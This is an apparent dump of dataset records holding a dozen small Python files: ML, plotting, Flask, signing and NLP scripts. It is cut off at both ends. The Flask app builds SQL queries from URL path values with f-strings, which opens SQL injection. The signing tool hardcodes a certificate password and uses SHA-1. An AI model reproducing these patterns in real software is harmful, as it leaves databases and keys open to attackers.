activation='softmax'))\r\n\r\nmodel.summary()\r\n\r\nmodel.compile(loss=keras.losses.categorical_crossentropy,\r\n optimizer=keras.optimizers.Adadelta(),\r\n metrics=['accuracy'])\r\n\r\nmodel.fit(x_train_np, y_train_np,\r\n batch_size=batch_size,\r\n epochs=epochs,\r\n verbose=1,\r\n validation_data=(x_test_np, y_test_np))\r\nscore = model.evaluate(x_test_np, y_test_np, verbose=0)\r\n\r\nmodel.save('model_cnn.h5')\r\n\r\nprint(score)\r\nprint('Test loss:', score[0])\r\nprint('Test accuracy:', score[1])","sub_path":"cleanCode.py","file_name":"cleanCode.py","file_ext":"py","file_size_in_byte":2531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"422265630","text":"import numpy as np\r\nimport pandas as pd\r\n\r\nfrom bokeh.plotting import figure, show, output_file\r\nfrom bokeh.models.widgets import Panel, Tabs\r\nfrom bokeh.io import output_file, show\r\nfrom bokeh.layouts import row\r\nfrom bokeh.palettes import Viridis3\r\nfrom bokeh.models import CheckboxGroup, CustomJS\r\n\r\ndata = pd.read_csv(\"GAS_ELK\\ELK_2016.csv\", decimal=',')\r\n\r\npost = pd.read_csv(\"4pp.csv\")\r\n\r\nhor = pd.read_csv('horecacoor.csv')\r\n\r\n\r\nxhor = [float(max(min(x*10000, 50130), 47500)) for x in hor['long']]\r\nyhor = [float(max(min(y*10000, 524200), 522930)) for y in hor['lat']]\r\nradiihor = [5+np.random.random()*2 for x in range(len(hor['long']))]\r\n\r\ncolorshor = []\r\nfor f in range(len(hor['long'])):\r\n if (hor['long'][f]-4) >= 0.9:\r\n longcol = (hor['long'][f]-4.9)*1700\r\n 
else:\r\n longcol = (hor['long'][f]-4.8)*700\r\n latcol = (hor['lat'][f]-52.3)*3200\r\n colorshor.append(\"#%02x%02x%02x\" % (int(max(min(latcol, 255), 190)), 0, int(longcol)))\r\n\r\navg = 0\r\ncounter = 0\r\nlastpost = 1011\r\n\r\nvalues = []\r\nxcoor = []\r\nycoor = []\r\n\r\ncoorlistx = []\r\ncoorlisty = []\r\npostcodelist = []\r\nll = []\r\navgpost = []\r\n\r\nfor j in data[\"POSTCODE_TOT\"]:\r\n if int(j[:4]) not in ll:\r\n ll.append(int(j[:4]))\r\n\r\nfor y in range(len(post[\"postcode\"])):\r\n if int(post[\"postcode\"][y]) in ll:\r\n coorlistx.append(post[\"longitude\"][y]*10000)\r\n coorlisty.append(post[\"latitude\"][y]*10000)\r\n postcodelist.append(post[\"postcode\"][y])\r\n\r\nlistcounter = 0\r\nfor i in range(len(data[\"POSTCODE_TOT\"])):\r\n if int(data[\"POSTCODE_TOT\"][i][:4]) in ll:\r\n avg += int(data[\"SJV\"][i]) * int(data[\"Aantal Aansluitingen\"][i]) * (float(data['%Fysieke status'][i])/100)\r\n counter += 1\r\n if lastpost != int(data[\"POSTCODE_TOT\"][i][:4]):\r\n if lastpost in ll:\r\n ll.remove(lastpost)\r\n if avg != 0:\r\n avgpost.append(int(avg/550000))\r\n avg, counter = 0,0\r\n lastpost = int(data[\"POSTCODE_TOT\"][i][:4])\r\n\r\nxcoor = coorlistx[:-1]\r\nycoor = coorlisty[:-1]\r\n\r\nx = xcoor\r\ny = ycoor\r\nradii = avgpost\r\n\r\ncolors = []\r\nfor f in avgpost:\r\n colors.append(\"#%02x%02x%02x\" % (int(max(min(f, 255), 65)), int(max(min(150-f, 255), 0)), int(max(min(f*4, 255), 65))))\r\n\r\nTOOLS=\"hover,crosshair,pan,wheel_zoom,zoom_in,zoom_out,box_zoom,undo,redo,reset,tap,save,box_select,poly_select,lasso_select,\"\r\n\r\np = figure(tools=TOOLS, plot_width=800, plot_height=580, title = 'ELEKTRICITEIT relatief aan horeca')\r\np.image_url(url=['Capture.png'],w=2668,h=1328, x=47494.287, y=524238.336)\r\n\r\np.scatter(xhor, yhor, radius=radiihor,\r\n fill_color=colorshor, fill_alpha=0.8,\r\n line_color=None)\r\n\r\np.scatter(x, y, radius=radii,\r\n fill_color=colors, fill_alpha=0.5,\r\n line_color=None)\r\n\r\np2 = figure(tools=TOOLS, plot_width=800, plot_height=580, title = 'ELEKTRICITEIT relatief aan horeca')\r\np2.image_url(url=['Capture.png'],w=2668,h=1328, x=47494.287, y=524238.336)\r\np2.scatter(x, y, radius=radii,\r\n fill_color=colors, fill_alpha=0.5,\r\n line_color=None)\r\n\r\ntab1 = Panel(child=p, title='Met horeca')\r\ntab2 = Panel(child=p2, title='Zonder horeca')\r\n\r\ntabs = Tabs(tabs=[tab1,tab2])\r\n\r\noutput_file(\"MAP_ELK_hor.html\", title=\"color_scatter.py example\")\r\n\r\nshow(tabs) # open a browser\r\n","sub_path":"project code and data/postcodeuphor.py","file_name":"postcodeuphor.py","file_ext":"py","file_size_in_byte":3270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"216318026","text":"from tkinter import *\nfrom tkinter.filedialog import askopenfile\nfrom tkinter.messagebox import *\nimport base64\nimport tkinter.ttk\n\nfrom OpenSSL.crypto import load_pkcs12, sign, verify\n\n\nroot = Tk()\nroot.title('文件签名验证工具')\ntkinter.ttk.Label(root, text=\"签名文件: \").grid(row=0)\ntkinter.ttk.Label(root, text=\"证书证书: \").grid(row=1)\ntkinter.ttk.Label(root, text=\"证书密码: \").grid(row=2)\ne1 = tkinter.ttk.Entry(root)\ne2 = tkinter.ttk.Entry(root)\ne3 = tkinter.ttk.Entry(root)\n\ne1.grid(row=0, column=1)\ne2.grid(row=1, column=1)\ne3.grid(row=2, column=1)\nprint(type(e1))\n\n\ndef fb1():\n # df = LoadFileDialog(root)\n # wfilename = df.go()\n df=askopenfile(mode='r')\n if df is None:\n return\n # print(df.name)\n filename = df.name\n if filename is None:\n return\n # filename = 
wfilename.replace('\\\\', '/')\n print(filename)\n e1.delete(0, END)\n e1.insert(0, filename)\n\n\ndef fb2():\n df = askopenfile(mode='r')\n # wcertname = df.go()\n if df == None:\n return\n filename = df.name\n # certname = wcertname.replace('\\\\', '/')\n certname = filename\n print(certname)\n if certname[-3:] == 'pfx':\n e2.delete(0, END)\n e2.insert(0, certname)\n else:\n print('Please choose pfx file')\n # mbox=Message(command='Please choose pfx file')\n showinfo(message='Please choose a pfx file')\n\n\ndef sign_verify(flag):\n print('call fbs')\n filedir = e1.get()\n if filedir == '':\n print('select file first')\n showinfo(message='请选择要签名或验证的文件')\n return\n pass\n ffile = open(filedir, 'rb')\n content = ffile.read()\n ffile.close()\n\n certdir = e2.get()\n if certdir == '':\n print('select cert first')\n showinfo(message='请选择要使用的证书文件')\n return\n pass\n fcert = open(certdir, 'rb')\n bcert = fcert.read()\n fcert.close()\n pkcs = load_pkcs12(bcert, b'22222222')\n x509 = pkcs.get_certificate()\n prkey = pkcs.get_privatekey()\n print('cert loaded')\n\n if flag == 1:\n\n try:\n sigdata = sign(prkey, content, 'sha1')\n except:\n showinfo(message='sign failed!')\n return 1\n\n showinfo(message='签名成功')\n print(sigdata)\n signature = base64.b64encode(sigdata)\n print(signature)\n\n fsig = open('d:/signature.bin', 'wb')\n fsig.write(signature)\n fsig.close()\n\n else:\n fsig = open('d:/signature.bin', 'rb')\n signature = fsig.read()\n fsig.close()\n sigdata = base64.b64decode(signature)\n\n try:\n if (verify(x509, sigdata, content, 'sha1') == None): # 验证签名\n showinfo(message='验证成功')\n\n except:\n showerror(message='验证失败')\n\n\nbtn_browse1 = tkinter.ttk.Button(root, text=' 浏览 ', command=fb1)\nbtn_browse1.grid(row=0, column=3)\nbtn_browse2 = tkinter.ttk.Button(root, text=' 浏览 ', command=fb2)\nbtn_browse2.grid(row=1, column=3)\nbtn_ok = tkinter.ttk.Button(root, text=' 确认 ')\nbtn_ok.grid(row=2, column=3)\n\nbtn_sign = tkinter.ttk.Button(root, text='签名', command=lambda: sign_verify(1)).grid(row=3)\nbtn_verify = tkinter.ttk.Button(root, text='验证', command=lambda: sign_verify(2)).grid(row=3, column=1)\nbtn_exit = tkinter.ttk.Button(root, text='退出', command=root.destroy).grid(row=3, column=2)\n\nif __name__ == '__main__':\n mainloop()\n\n","sub_path":"source/tksv.py","file_name":"tksv.py","file_ext":"py","file_size_in_byte":3474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"369961980","text":"import os\n\nimport pandas as pd\nimport numpy as np\n\nimport sqlalchemy\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine, MetaData\nimport decimal\nimport flask\nfrom flask import Flask, jsonify, render_template, request, redirect\nfrom flask_sqlalchemy import SQLAlchemy\nfrom config import endpoint, username, password, instance, port\n\nimport pymysql\npymysql.install_as_MySQLdb()\n\ndburl = f'mysql://{username}:{password}@{endpoint}:{port}/{instance}'\n\napp = Flask(__name__)\n\n\napp.config[\"SQLALCHEMY_DATABASE_URI\"] = dburl\ndb = SQLAlchemy(app)\nengine = create_engine(f\"mysql://{username}:{password}@{endpoint}:{port}/{instance}\")\nconn = engine.connect()\n# reflect an existing database into a new model\n# Base = automap_base()\n# reflect the tables\n# Base.prepare(db.engine, reflect=True)\n\nmetadata = MetaData(engine, reflect=True)\n\n# Save references to each table\nbirth_control = metadata.tables[\"birth_control_all\"]\nside_effects = 
metadata.tables[\"side_effects_db\"]\n#print(birth_control)\n\n@app.route(\"/\")\ndef home():\n \"\"\"Render Home Page.\"\"\"\n return render_template(\"index.html\")\n\n\n@app.route(\"/aaron\")\ndef aaron():\n \"\"\"Render Home Page.\"\"\"\n return render_template(\"aaron.html\")\n\n\n@app.route(\"/side_effects\")\ndef effectreview():\n \"\"\"Render Side Effect Page.\"\"\"\n return render_template(\"sideeffect_viz.html\")\n\n\n@app.route(\"/birthcontrol_db\")\ndef birthcontrol():\n #create list of column names\n BC_df = pd.read_sql(\"SELECT * FROM birth_control_all\", conn)\n BC_json = BC_df.to_json(orient=\"records\")\n return BC_json\n\n@app.route(\"/wordcount/\")\ndef wordcount_method(wordcount_method):\n #Options: wc_all, wc_shot, wc_hormonal_iud,\n # wc_non_hormonal_iud, wc_progestin_pill, wc_combination_pill,\n #wc_implant, wc, wc_ring\n wordcount_method = pd.read_sql(f\"SELECT * FROM {wordcount_method}\", conn)\n wordcount_method_json = wordcount_method.to_json(orient=\"records\")\n return wordcount_method_json\n\n@app.route(\"/sentiment/\")\ndef sentiment_method(sentiment_method):\n #Options: sentiment_all, sentiment_shot, sentiment_hormonal_iud,\n # sentiment_non_hormonal_iud, sentiment_progestin_pill, sentiment_combination_pill,\n # sentiment_implant, sentiment_patch, sentiment_ring\n sentiment_method = pd.read_sql(f\"SELECT * FROM {sentiment_method}\", conn)\n sentiment_method_json = sentiment_method.to_json(orient=\"records\")\n return sentiment_method_json\n\n@app.route(\"/vader/\")\ndef vader_method(vader_method):\n #Options: Shot, Ring, Patch, Implant, Hormonal IUD, Non-hormonal IUD, Combination Pill, Progestin Pill\n review_effects = pd.read_sql(\"SELECT * FROM review_effects\", conn)\n\n if vader_method != 'All':\n vader_count = review_effects.loc[review_effects['method'] == vader_method]\n vader_count = pd.DataFrame(vader_count['sentiment'].value_counts())\n vader_count.index.name = 'Category'\n vader_count['Category'] = vader_count.index\n else:\n vader_count = pd.DataFrame(review_effects['sentiment'].value_counts())\n vader_count.index.name = 'Category'\n vader_count['Category'] = vader_count.index\n\n vader_method_json = vader_count.to_json(orient=\"records\")\n return vader_method_json\n\n@app.route(\"/birthcontrol_db/\")\ndef birthcontrolmethod(choice):\n\n # Filter the data based on the choice\n #Shot, Ring, Patch, Implant, Hormonal IUD, Non-hormonal IUD, Combination Pill, Progestin Pill\n BC_df = pd.read_sql(\"SELECT * FROM birth_control_all\", conn)\n choice_data = BC_df.loc[BC_df[\"Method\"] == choice]\n choice_json = choice_data.to_json(orient=\"records\")\n\n return jsonify(choice_json)\n\n@app.route(\"/side_effects_db\")\ndef sideeffects():\n #create list of column names\n side_effects_df = pd.read_sql(\"SELECT * FROM side_effects_db\", conn)\n side_effects_json = side_effects_df.to_json(orient=\"records\")\n return side_effects_json\n\n@app.route(\"/side_effects_db/\")\ndef sideeffectsmethod(choice):\n\n # Filter the data based on the choice\n #Shot, Ring, Patch, Implant, Hormonal IUD, Non-hormonal IUD, Combination Pill, Progestin Pill\n SE_df = pd.read_sql(\"SELECT * FROM side_effects_db\", conn)\n se_data = SE_df.loc[SE_df[\"Method\"] == choice]\n se_json = se_data.to_json(orient=\"records\")\n\n return jsonify(se_json)\n\n@app.route(\"/user_review_table\")\ndef user_review_():\n #create list of column names\n bc_user_table = pd.read_sql(\"SELECT * FROM bc_user_table\", conn)\n bc_user_table_json = bc_user_table.to_json(orient=\"records\")\n return 
bc_user_table_json\n\nif __name__ == '__main__':\n app.run(debug=True)","sub_path":"Backup/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"616817972","text":"#!/usr/bin/env python3\n\nfrom cmd import Cmd\nimport getopt\nimport sys\n\nfrom configdb import session\nfrom hadoop import create_mapreduce\n\nAPP_TYPES = ('mapreduce', 'hbase', 'impala', 'spark')\nAPP_TYPES_STRING = '|'.join(APP_TYPES)\n\nclass StolaxyCmd(Cmd):\n\n intro = \"\"\"Stolaxy Big Data Platform Manager. Cachebox Inc (c) 2015.\\n\n? for help\nquit to quit.\n\"\"\"\n\n prompt = \"stolaxy> \"\n\n def do_help(self, x):\n print ('available commands:')\n print ('create')\n print ('list')\n\n def do_list(self, x):\n x = x.split()\n if len(x) == 0:\n print ('nodes ...')\n return\n\n def do_create(self, x):\n x = x.split()\n \n def help():\n print ('create app <%s> ', APP_TYPES_STRING)\n print ('create host ')\n\n if len(x) == 0:\n help()\n return\n\n try:\n if x[0] == 'app':\n apptype = x[1]\n if apptype not in APP_TYPES:\n help()\n return\n\n if apptype == 'mapreduce':\n create_mapreduce(name = x[2])\n\n else:\n help()\n return\n except:\n help()\n\n return\n\n def do_quit(self, x):\n sys.exit(0)\n\ndef main():\n Cmd.cmdloop(StolaxyCmd())\n\nif __name__ == '__main__':\n main()\n","sub_path":"spmc/stomp.py","file_name":"stomp.py","file_ext":"py","file_size_in_byte":1391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"443147534","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nimport csv\nfrom sklearn.decomposition import PCA\n\n'''\n计算用户得分权重,不要用非静态全局变量2333\n'''\n\n\nclass GetWeightClass:\n def __init__(self, source, output):\n self.source = source\n self.output = output\n self.user_ids = []\n self.case_ids = []\n '''\n 读取csv文件\n :param\n :return: 获得需要pca处理的np.array\n '''\n def read_csv(self):\n result = []\n lines = []\n with open(self.source, 'r', encoding='utf-8') as f:\n reader = csv.reader(f)\n next(reader)\n for item in reader:\n lines.append(item)\n for item in lines:\n tmp = []\n self.user_ids.append(int(item[0])) # user_ids\n self.case_ids.append(int(item[1])) # case_ids\n tmp.append(100 / float(item[2])) # 提交次数的负相关\n tmp.append(float(item[5])) # 最终得分\n arr1 = item[3].split('|') # 每次提交的得分\n arr2 = item[4].split('|') # 分数变化\n tmp.append(float(arr1[0])) # 第一次得分\n\n tmp1 = [] # 记录所有的分数变化(>0)\n if float(arr1[0]) > 0:\n tmp1.append(float(arr1[0]))\n\n for item in arr2:\n if item == '':\n break\n if float(item) > 0:\n tmp1.append(float(item))\n\n sum = 0\n for i in tmp1:\n sum += i\n\n if len(tmp1) == 0:\n average_change = 0\n else:\n average_change = sum / len(tmp1)\n tmp.append(average_change)\n\n result.append(tmp)\n\n lines.clear()\n a = np.array(result)\n return a\n\n '''\n 读取csv文件\n :param\n :return: 经过pca降维处理的np.array\n '''\n def pca_method(self):\n pca = PCA(n_components=1)\n a = self.read_csv()\n new_a = pca.fit_transform(a)\n b = -1 * new_a + np.max(new_a)\n b = b / (np.max(b))\n return b\n\n def get_result(self):\n result = []\n tmp = self.pca_method()\n title = [\"user_id\", \"case_id\", \"result\"]\n result.append(title)\n for i in range(len(self.user_ids)):\n tmp2 = []\n tmp2.append(self.user_ids[i])\n tmp2.append(self.case_ids[i])\n tmp2.append(float(tmp[i]))\n result.append(tmp2)\n\n return result\n\n def get_weight(self):\n print(\"Start get Weight!\")\n with open(self.output, 'w', newline=\"\") as f:\n writer = 
csv.writer(f)\n result = self.get_result()\n for line in result:\n writer.writerow(line)\n print(\"Finish get Weight!\")\n\nif __name__ == '__main__':\n pca = GetWeightClass(\"../OurModelOutPut/Cases/action_statistics.csv\",\n '../OurModelOutPut/Cases/user_weight.csv')\n pca.get_weight()\n\n\n","sub_path":"OurModel/_3_User_Weight.py","file_name":"_3_User_Weight.py","file_ext":"py","file_size_in_byte":2995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"266558305","text":"\"\"\"Transfer entropy using the Gaussian-Copula.\"\"\"\nimport numpy as np\nimport xarray as xr\n\nfrom frites.core import cmi_nd_ggg, copnorm_nd\nfrom frites.config import CONFIG\n\n\ndef conn_transfer_entropy(x, max_delay=30, pairs=None, gcrn=True):\n \"\"\"Across-trials transfer entropy.\n\n The transfer entropy represents the amount of information that is send\n from a source to a target. It is defined as :\n\n .. math::\n\n TE = I(source_{past}; target_{present} | target_{past})\n\n Where :math:`past` is defined using the `max_delay` input parameter. Note\n that the transfer entropy only provides about the amount of information\n that is sent, not on the content.\n\n Parameters\n ----------\n x : array_like\n Array of data of shape (n_roi, n_times, n_epochs). Must be a gaussian\n variable\n max_delay : int | 30\n Number of time points defining where to stop looking at in the past.\n Increasing this maximum delay input can lead to slower computations\n pairs : array_like\n Array of pairs to consider for computing the transfer entropy. It\n should be an array of shape (n_pairs, 2) where the first column refers\n to sources and the second to targets. If None, all pairs will be\n computed\n gcrn : bool | True\n Apply a Gaussian Copula rank normalization\n\n Returns\n -------\n te : array_like\n The transfer entropy array of shape (n_pairs, n_times - max_delay)\n pairs : array_like\n Pairs vector use for computations of shape (n_pairs, 2)\n \"\"\"\n # -------------------------------------------------------------------------\n # check pairs\n n_roi, n_times, n_epochs = x.shape\n if not isinstance(pairs, np.ndarray):\n pairs = np.c_[np.where(~np.eye(n_roi, dtype=bool))]\n assert isinstance(pairs, np.ndarray) and (pairs.ndim == 2) and (\n pairs.shape[1] == 2), (\"`pairs` should be a 2d array of shape \"\n \"(n_pairs, 2) where the first column refers to \"\n \"sources and the second to targets\")\n x_all_s, x_all_t = pairs[:, 0], pairs[:, 1]\n n_pairs = len(x_all_s)\n # check max_delay\n assert isinstance(max_delay, (int, np.int)), (\"`max_delay` should be an \"\n \"integer\")\n # check input data\n assert (x.ndim == 3), (\"input data `x` should be a 3d array of shape \"\n \"(n_roi, n_times, n_epochs)\")\n x = x[..., np.newaxis, :]\n\n # -------------------------------------------------------------------------\n # apply copnorm\n if gcrn:\n x = copnorm_nd(x, axis=-1)\n\n # -------------------------------------------------------------------------\n # compute the transfer entropy\n te = np.zeros((n_pairs, n_times - max_delay), dtype=float)\n for n_s, x_s in enumerate(x_all_s):\n # select targets\n is_source = x_all_s == x_s\n x_t = x_all_t[is_source]\n targets = x[x_t, ...]\n # tile source\n source = np.tile(x[[x_s], ...], (targets.shape[0], 1, 1, 1))\n # loop over remaining time points\n for n_d, d in enumerate(range(max_delay + 1, n_times)):\n t_pres = np.tile(targets[:, [d], :], (1, max_delay, 1, 1))\n past = slice(d - max_delay - 1, d - 1)\n s_past = source[:, past, 
...]\n t_past = targets[:, past, ...]\n # compute the transfer entropy\n _te = cmi_nd_ggg(s_past, t_pres, t_past, **CONFIG[\"KW_GCMI\"])\n # take the sum over delays\n te[is_source, n_d] = _te.mean(1)\n\n return te, pairs","sub_path":"frites/conn/conn_transfer_entropy.py","file_name":"conn_transfer_entropy.py","file_ext":"py","file_size_in_byte":3621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"169893178","text":"# Compute the frequency of each trigram \nimport json\nimport codecs\nimport heapq\nimport os\nfrom util import get_dataset_list\nfrom wordfreq import get_word_freq\n\ndef count_tri_freq(gram, datalist):\n\tif gram < 3:\n\t\tprint('Use the count_word_freq function')\n\t\treturn\n\n\tformer_path = '../data/word_count/' + str(gram-1) + 'gram.json'\n\tf = codecs.open(former_path)\n\tformer_obj = json.load(f)\n\tf.close()\n\n\tword_count = {}\n\n\tfor data in datalist:\n\t\twith codecs.open(data) as f:\n\t\t\tfor line in f:\n\t\t\t\tl = len(line)\n\t\t\t\tif l < gram:\n\t\t\t\t\tcontinue\n\n\t\t\t\tfor i in range(gram-1, l):\n\t\t\t\t\tword = line[i-gram+1:i+1]\n\t\t\t\t\tif ' ' in word:\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tif line[i-gram+1:i] not in former_obj:\n\t\t\t\t\t\tcontinue\n\n\t\t\t\t\tif word in word_count:\n\t\t\t\t\t\tword_count[word] = word_count[word] + 1\n\t\t\t\t\telse:\n\t\t\t\t\t\tword_count[word] = 0\n\n\t#select maximum 10^6 or 10^5 elements in word_count\n\theap = [(value, key) for key,value in word_count.items()]\n\tpick = 0\n\tif gram == 3:\n\t\tpick = 1000000\n\telse:\n\t\tpick = 100000\n\tlargest = heapq.nlargest(pick, heap)\n\tword_count = dict([(key, value) for value, key in largest])\n\n\tword_count_json = json.dumps(word_count)\n\n\tcount_path = '../data/word_count'\n\ttry: \n\t os.mkdir(count_path)\n\texcept OSError: \n\t print (\"Directory %s already exists\" % count_path)\n\telse: \n\t print (\"Successfully created the directory %s \" % count_path)\n\n\twrite_path = count_path + '/' + str(gram) + 'gram.json'\n\n\twith codecs.open(write_path, 'w') as f:\n\t\tf.write(word_count_json)\n\t\n\ndef trigram_freq(gram):\n\tif gram < 3:\n\t\tprint('Use the word_freq function')\n\t\treturn\n\n\tdatalist = get_dataset_list()\n\tcount_tri_freq(gram, datalist)","sub_path":"src/trifreq.py","file_name":"trifreq.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"633599113","text":"import numpy as np\n\ndef first_stack(X1,X2,flag):\n if flag:\n flag = 0\n X1 = X2\n else:\n X1 = np.row_stack((X1,X2))\n return X1,flag\n\n\ndef remove_and_combine(X,y,X_num):\n if X.ndim == 1:\n X_new = list(X)\n del X_new[X_num]\n X_new.append(y)\n else:\n X_new = np.delete(X,X_num,1)\n X_new = np.column_stack((X_new,y))\n return X_new\n","sub_path":"minibatch_sgd/data_process/tool/combine.py","file_name":"combine.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"427835210","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nNAME: USConst_MaskedWordCloud.py\r\nPURPOSE: Create a word cloud from a text document of the US Constitution and\r\n shape it like the continental US.\r\nSOURCE: Adapted from Andreas Mueller's examples at \r\n https://amueller.github.io/word_cloud/auto_examples/index.html\r\n\"\"\"\r\n\r\nimport argparse\r\nfrom PIL import Image\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom wordcloud import WordCloud, 
STOPWORDS\r\n\r\n# parse the command line arguments so that you can use this code for other \r\n# text documents and masks. \r\nparser = argparse.ArgumentParser()\r\nparser.add_argument('--infile', action = 'store', \r\n default = \"../Documents/NatLangProc/USConstitution/USConstitution.txt\", \r\n help='path to text file')\r\nparser.add_argument('--mask', action = 'store', \r\n default = \"us.jpg\", help='path to mask file as a .jpg')\r\nparser.add_argument('--out', action = 'store',\r\n default = \"USConst_wordCloud.png\", help='path to output file')\r\nargs = parser.parse_args()\r\n\r\n# read US Constintution text into a single string\r\nwith open(args.infile, 'r') as myfile:\r\n text = myfile.read().replace('\\n', ' ')\r\n\r\n# read the mask image\r\n# from http://www.stencilry.org/stencils/\r\nus_mask = np.array(Image.open(args.mask))\r\n\r\n# create a set ouf of stopwords\r\nstopwords = set(STOPWORDS)\r\nmoreStopWords = [\"Section\", \"AMENDMENT\", \"section\", \"without\", \"article\", \r\n \"within\", \"otherwise\", \"upon\", \"whenever\", \"begin\", \"thereof\",\r\n \"unless\", \"become\", \"among\", \"may\", \"made\", \"Day\", \"make\", \r\n \"Place\", \"either\", \"every\", \"wherein\", \"hereof\", \"therein\", \r\n \"hereby\"]\r\nfor w in moreStopWords:\r\n stopwords.add(w)\r\n\r\n# instantiate the word cloud generator\r\nwc = WordCloud(background_color = 'aliceblue', mask = us_mask, stopwords = stopwords, \r\n margin=5, colormap = 'seismic', random_state = 9)\r\n\r\n# generate word cloud\r\nwc.generate(text)\r\n\r\n# store to file\r\nwc.to_file(args.out)\r\n\r\n# show\r\nplt.imshow(wc, interpolation='bilinear')\r\nplt.axis(\"off\")\r\nplt.show()","sub_path":"Code/USConst_MaskedWordCloud.py","file_name":"USConst_MaskedWordCloud.py","file_ext":"py","file_size_in_byte":2077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"478180384","text":"import pathlib\nfrom itertools import combinations\n\nfile_name = \"19_test.txt\"\ncurrent_dir = pathlib.Path(__file__).parent.absolute()\nfile_path = pathlib.Path(current_dir / \"data\" / file_name)\n\nwith open(file_path, \"r\") as file:\n received = [line.strip() for line in file.readlines()]\n\nsplitpoint = received.index('')\n\nrules = received[:splitpoint]\nmessages = received[splitpoint + 1:]\n\nrules_dict = {}\ncomplete = {}\n\n# find letters\nfor rule in rules:\n index, content = rule.split(\": \")\n if content[0] == '\"':\n rules_dict[index] = content[1]\n complete[index] = True\n\nprint(complete)\nprint(complete.keys())\n\n# parse rules into rules dict\nfor rule in rules:\n index, content = rule.split(\": \")\n print(index, content)\n if content[0] == '\"':\n continue\n else:\n content = content.split(\"|\")\n content = [[co for co in cont if co != \" \"] for cont in content]\n # split on or terminator into two different lists\n rules_dict[index] = content\n\n# replace rules with known info\nall_done = False\npasses = 0\nwhile not all_done:\n passes +=1\n for k, v in rules_dict.items():\n if k in complete.keys():\n continue\n current_rules_list = []\n for rule in v:\n current_rule = []\n for fragment in rule:\n print(f\"frag: {fragment}\")\n if fragment in complete.keys():\n current_rule.append(rules_dict[fragment])\n else:\n current_rule.append(fragment)\n current_rules_list.append(current_rule)\n rules_dict[k] = current_rules_list\n \n # check for any completed, mark as complete in complete dict\n all_done = True\n for k,v in rules_dict.items():\n if k in complete.keys():\n 
continue\n done = True\n for rule in v:\n for fragment in rule:\n print(f\"checkfrag: {fragment}\")\n if fragment not in ['a','b']:\n done = False\n all_done = False\n if done:\n complete[k] = True \n\n \n print(f\"Results after {passes}\")\n print(rules_dict)\n","sub_path":"19_1.py","file_name":"19_1.py","file_ext":"py","file_size_in_byte":2168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"443464699","text":"import gym\nfrom gym import spaces\nimport vizdoom as vzd\nfrom time import sleep, time\nimport random\nimport numpy as np\nimport itertools as it\nimport copy\nfrom PIL import Image as im\nimport skimage.color, skimage.transform\nfrom debugging.keyboard import KEYBOARD\n\nENVS = [\"basic\", \"deadly_corridor\"]\n\n\nclass Rewards:\n def __init__(self, game):\n self.last_hits = 0\n self.last_kills = 0\n self.last_hitmon = 0\n\n varibales = game.get_available_game_variables()\n self.last_health = game.get_game_variable(varibales[0].HEALTH)\n\n def get_reward(self, current_hitmon, current_kill, current_hit, current_health, death, others):\n if death:\n death_val = 1\n else:\n death_val = 0\n info = {\"hit\": current_hit,\n \"kill\": current_kill,\n \"hit monster\": current_hitmon,\n \"health\": current_health,\n \"death\": death_val,\n \"other\": others}\n\n reward = (current_hit - self.last_hits) * (-2) + \\\n (current_kill - self.last_kills) * 100 + \\\n (current_hitmon - self.last_hitmon) * 1 + \\\n (current_health - self.last_health) * 20 + \\\n death_val * (-100) + \\\n others\n\n self.last_hits = current_hit\n self.last_health = current_health\n self.last_hitmon = current_hitmon\n self.last_kills = current_kill\n\n return reward, info\n\n\nclass DoomEnv(gym.Env):\n def __init__(self, display=False, feature=\"cnn\", env_index: int = 0, debug=False, learning_type=\"sac\"):\n self.config_dir = \"./scenarios/\" + ENVS[env_index] + \".cfg\"\n\n self.display = display\n self.debug = debug\n self.game = self._initialize_game(config_file_path=self.config_dir)\n if self.debug:\n self.keyboard = KEYBOARD()\n\n n = self.game.get_available_buttons_size()\n # self.actions = [list(a) for a in it.product([0, 1], repeat=n)]\n self.actions = np.eye(n)\n\n # Sets time that will pause the engine after each action (in seconds)\n # Without this everything would go too fast for you to keep track of what's happening.\n if self.display:\n self.sleep_time = 1. 
/ vzd.DEFAULT_TICRATE # = 0.028\n else:\n self.sleep_time = .01 / vzd.DEFAULT_TICRATE # = 0.0028\n\n self.resolution = (80, 120)\n self.feature = feature\n if self.feature == \"cnn\":\n self.observation_space = spaces.Box(low=0, high=255, # dtype=np.uint8,\n shape=(self.resolution[0], self.resolution[1], 4))\n else:\n self.observation_space = spaces.Box(low=0, high=255, # dtype=np.uint8,\n shape=(self.resolution[0] * self.resolution[1] * 4,))\n # self.action_space = spaces.Discrete(len(self.actions))\n\n self.learning_type = learning_type\n if self.learning_type == \"sac\":\n self.action_space = spaces.Box(np.array([0]), np.array([n]))\n elif self.learning_type == \"ppo\":\n self.action_space = spaces.Discrete(n)\n\n self.reward = Rewards(self.game)\n\n self.last_state = None\n self.last2n_state = None\n self.last3r_state = None\n\n def _initialize_game(self, config_file_path):\n game = vzd.DoomGame()\n game.load_config(config_file_path)\n game.set_window_visible(self.display)\n game.set_mode(vzd.Mode.PLAYER)\n 